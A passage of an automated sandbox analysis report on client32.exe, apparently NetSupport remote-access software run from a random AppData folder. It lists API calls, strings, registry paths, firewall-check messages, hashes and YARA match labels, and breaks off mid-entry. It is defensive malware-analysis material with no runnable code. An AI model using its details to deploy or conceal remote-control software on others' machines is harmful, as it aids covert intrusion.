                                                                              • API ID: CountTick
                                                                              • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                              • API String ID: 536389180-1512301160
                                                                              • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                              • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                              APIs
                                                                              • send.WSOCK32(?,?,?,00000000), ref: 6EEF9C93
                                                                              • timeGetTime.WINMM(?,?,?,00000000), ref: 6EEF9CD0
                                                                              • Sleep.KERNEL32(00000000), ref: 6EEF9CDE
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6EEF9D4F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6EEF9D72
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                              • String ID: 3'
                                                                              • API String ID: 77915721-280543908
                                                                              • Opcode ID: a5c47354e0f3dbf1ff835951e36dd716ef1a62a57086cbab1acc88432293fc30
                                                                              • Instruction ID: b297e5681e58efaa4731b9ae62df935e0ba6c1774647668d2e1370a7e6c2f688
                                                                              • Opcode Fuzzy Hash: a5c47354e0f3dbf1ff835951e36dd716ef1a62a57086cbab1acc88432293fc30
                                                                              • Instruction Fuzzy Hash: 8D219F71A141198FDB21DFE4CC94BDAB3A5AF05314F218296D84D97281C736DD86CF91
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                              • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                              • API String ID: 3222248624-258972079
                                                                              • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                              • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                              • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                              • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                              • API String ID: 4186647306-532032230
                                                                              • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                              • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                              • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                              • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                              • API String ID: 2579639479-1136101629
                                                                              • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                              • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s%s.bin$134349$_HF$_HW$_SW
                                                                              • API String ID: 2111968516-3092085523
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06950
                                                                                • Part of subcall function 6EF07BE0: _memset.LIBCMT ref: 6EF07BFF
                                                                                • Part of subcall function 6EF07BE0: _strncpy.LIBCMT ref: 6EF07C0B
                                                                                • Part of subcall function 6EEFA4E0: EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,?,?,6EEFDA7F,?,00000000), ref: 6EEFA503
                                                                                • Part of subcall function 6EEFA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFA568
                                                                                • Part of subcall function 6EEFA4E0: Sleep.KERNEL32(00000000,?,6EEFDA7F,?,00000000), ref: 6EEFA581
                                                                                • Part of subcall function 6EEFA4E0: LeaveCriticalSection.KERNEL32(6EF3B898,00000000), ref: 6EEFA5B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                              • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                              • API String ID: 1112461860-1140593649
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                              • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                              • RegisterClassA.USER32(?), ref: 111036EF
                                                                              • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                              • String ID: NSMDesktopWnd
                                                                              • API String ID: 2669163067-206650970
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                              • API String ID: 47109696-3245241687
                                                                              APIs
                                                                                • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                              • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                              • API String ID: 806825551-1858614750
                                                                              APIs
                                                                                • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                              • ResetEvent.KERNEL32(00000268), ref: 11144E39
                                                                              • SetEvent.KERNEL32(00000268), ref: 11144E4F
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                              • String ID: MiniDump
                                                                              • API String ID: 1494854734-2840755058
                                                                              APIs
                                                                                • Part of subcall function 6EEF5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                                • Part of subcall function 6EEF5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6EEF8EAE
                                                                              • FreeLibrary.KERNEL32(?), ref: 6EEF8EBF
                                                                                • Part of subcall function 6EEF2420: _strrchr.LIBCMT ref: 6EEF242E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressChangeCloseFileFindFreeLibraryModuleNameNotificationProc_strrchr
                                                                              • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                              • API String ID: 4066820201-3459472706
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                              • wsprintfA.USER32 ref: 11147A16
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                              • API String ID: 1985783259-2296142801
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                              • API String ID: 3234921582-2664294811
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                              • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: SetProcessDpiAwareness$shcore.dll
                                                                              • API String ID: 1108920153-1959555903
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11031FE6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                              • String ID: %s%s.bin$134349$clientinv.cpp$m_pDoInv == NULL
                                                                              • API String ID: 4180936305-3984113849
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                              • __strdup.LIBCMT ref: 11145277
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                              • _free.LIBCMT ref: 111452AC
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                              • String ID:
                                                                              • API String ID: 398584587-0
                                                                              APIs
                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                              • _free.LIBCMT ref: 1100EE64
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1100EE77
                                                                              • _free.LIBCMT ref: 1100EE8A
                                                                              • _free.LIBCMT ref: 1100EE9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                              • String ID:
                                                                              • API String ID: 3515823920-0
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 1114650E
                                                                              • wsprintfA.USER32 ref: 11146524
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A78400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateFolderPathwsprintf$ChangeCloseFindModuleNameNotification
                                                                              • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                              • API String ID: 1400454717-2600120591
                                                                              • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                              • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                              • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                              • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                              • CoUninitialize.OLE32 ref: 110F4BE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3550192930-0
                                                                              • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                              • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A78400,?), ref: 11143E97
                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile$ChangeCloseFindNotification
                                                                              • String ID: "
                                                                              • API String ID: 353575653-123907689
                                                                              • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                              • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,EE49F673,75922EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                              • String ID: Client$DisableGeolocation
                                                                              • API String ID: 3315423714-4166767992
                                                                              • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                              • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • TranslateMessage.USER32(?), ref: 11027850
                                                                              • DispatchMessageA.USER32(?), ref: 11027856
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                              • String ID: Exit Msgloop, quit=%d
                                                                              • API String ID: 3212272093-2210386016
                                                                              • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                              • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110179ED
                                                                                • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                                • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                                • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                              • SetEvent.KERNEL32(0000033C), ref: 11017A0D
                                                                              • GetTickCount.KERNEL32 ref: 11017A13
                                                                              Strings
                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                              Memory Dump Source
